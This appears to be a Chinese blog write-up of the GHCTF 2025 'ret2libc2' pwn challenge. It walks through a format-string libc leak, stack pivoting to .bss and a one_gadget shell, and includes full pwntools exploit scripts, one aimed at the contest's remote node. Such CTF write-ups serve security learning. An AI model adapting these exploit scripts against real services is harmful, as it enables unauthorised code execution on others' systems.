栈迁移与onegadget利用[GHCTF 2025]ret2libc2

ida 看 main 函数

跟进 func 函数

原以为可以直接打 ret2libc,但是这里没有程序没有 pop rdi

不过这里存在格式化字符串漏洞,也可以用来泄露 libc

我们直接看汇编

虽然 format 被初始化为 "hello world!"

但是它就在 buf 下面,后面的 read 我们可以读入 0x60

因此我们就可以覆盖 format,利用 printf 来泄露 libc 里的真实地址

这里 rax 存的就是 buf,我们溢出后劫持程序到 0x401227,即指令:

复制代码
mov rdi, rax 

后面再次执行 printf 函数,打印出真实地址,我们就可以计算 libc 基址了

然后程序会继续执行 read 函数,我们又可以溢出,劫持到 system 从而 getshell

大致利用思路就是这样,那么我们先找一下偏移

我一开始想直接用这个 __libc_start_call_main

但是在 libc 的符号表里面没有找到

后面换用 __libc_start_main

可以看到,这里 __libc_start_main+128 的偏移是 27

计算基址:

python 复制代码
libc_base = libc_start_main_128 - 128 - libc.symbols['__libc_start_main']

但是这里还有一个问题

正常的函数开头会有:

python 复制代码
push rbp
mov rbp, rsp
sub rsp, xxx

由于我们劫持到了函数的中间位置(0x401227)

栈帧没被设置,rbp 如果被我们填成了垃圾数据,后面 leave 指令就会出问题

因为 rsp 指向了一块无意义的数据,pop rbp 和 ret 都会崩掉

因此 rbp 不能随便填充

我们就需要进行栈迁移,我们一般迁移到 bss 段,可控可写

因为程序没有 pop rdi,我们在 libc 里面找

ret 都有,随便用一个即可

python 复制代码
pop_rdi = libc_base + 0x2a3e5
ret_addr = libc_base + 0x29139
#ret_addr = 0x40101a

按理来说我们就可以打 ret2libc 了

编写 exp:

python 复制代码
# @author:My6n
# @time:20250525
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
io = process('./pwn')
#io = remote('node1.anna.nssctf.cn',28712)
elf = ELF('./pwn')
bss_addr = 0x404060
payload1 = b'%27$p'.ljust(0x30,b'\x00') + p64(bss_addr) + p64(0x401227)

io.sendline(payload1)
io.recvuntil('0x')
libc_start_main_128 = int(io.recv(12),16)
print(hex(libc_start_main_128))

#libc = ELF('libc.so.6') 
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc_base = libc_start_main_128 - 128 - libc.symbols['__libc_start_main']
system_addr = libc_base + libc.symbols['system']
bin_sh_addr = libc_base + next(libc.search('/bin/sh'))
pop_rdi = libc_base + 0x2a3e5
ret_addr = libc_base + 0x29139
#ret_addr = 0x40101a

payload2 = cyclic(0x30) + p64(bss_addr) + p64(ret_addr) + p64(pop_rdi) + p64(bin_sh_addr) + p64(system_addr)
io.sendline(payload2)
io.interactive()

但是这里没有打通

结合题目提示,需要打 onegadget

那么我们就直接打 onegadget呗

我们尽量让 rbp 往高地址靠,这样容易满足 [rbp-0x70]=NULL 的条件

这里试了下,下面的两个都是可以的:

python 复制代码
onegadget = 0xebc81 + libc_base
onegadget = 0xebd43 + libc_base

编写 exp:

python 复制代码
# @author:My6n
# @time:20250525
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
#io = process('./pwn')
io = remote('node1.anna.nssctf.cn',28712)
elf = ELF('./pwn')
bss_addr = 0x404060
payload=b'%27$p'.ljust(0x30,b'\x00') + p64(bss_addr) + p64(0x401227)

io.sendline(payload)
io.recvuntil('0x')
libc_start_call_main_128 = int(io.recv(12),16)
print(hex(libc_start_call_main_128))

libc = 	ELF('libc.so.6') 
libc_base = libc_start_call_main_128 - 128 - libc.symbols['__libc_start_main']
system_addr = libc_base + libc.symbols['system']
bin_sh_addr = libc_base + next(libc.search('/bin/sh'))
pop_rdi = libc_base + 0x2a3e5
#ret_addr = libc_base + 0x29139
ret_addr = 0x40101a

#onegadget = 0xebc81 + libc_base
onegadget = 0xebd43 + libc_base
#payload2 = cyclic(0x30) + p64(bss_addr) + p64(ret_addr) + p64(pop_rdi) + p64(bin_sh_addr) + p64(system_addr)

payload2 = cyclic(0x30) + p64(bss_addr+0x100) + p64(onegadget)
io.sendline(payload2)
io.interactive()

可以打通,没有问题

拿到 flag: NSSCTF{ac2d7858-c021-430a-ba8d-e5b6d14139da}

相关推荐
粟悟饭&龟波功23 分钟前
【网络安全】四、中级篇:SQL注入详解
sql·安全·web安全
AEJL叁7 小时前
BUUCTF get_started_3dsctf_2016 wp
pwn
FIN666810 小时前
新天力:食品容器安全与创新的领航者
科技·安全·产品运营·创业创新·制造
alex10010 小时前
BeaverTails数据集:大模型安全对齐的关键资源与实战应用
人工智能·算法·安全
鹿鸣天涯10 小时前
Kali Linux 2025.3 正式发布:更贴近前沿的安全平台
linux·运维·安全
Sylvia-girl11 小时前
C语言中经常使用的函数
c语言·开发语言
!chen11 小时前
Harbor磁盘空间清理指南:如何安全清理半年前的镜像
安全
alex10011 小时前
Context Compliance Attack:大模型安全的新兴威胁与防御策略
网络·安全·web安全
Cauhele浅能11 小时前
【嵌入式C快捷键设计】表驱动法实现
c语言·设计模式
润 下12 小时前
C语言——深入理解函数声明定义和调用访问
c语言·开发语言·经验分享·笔记·程序人生·其他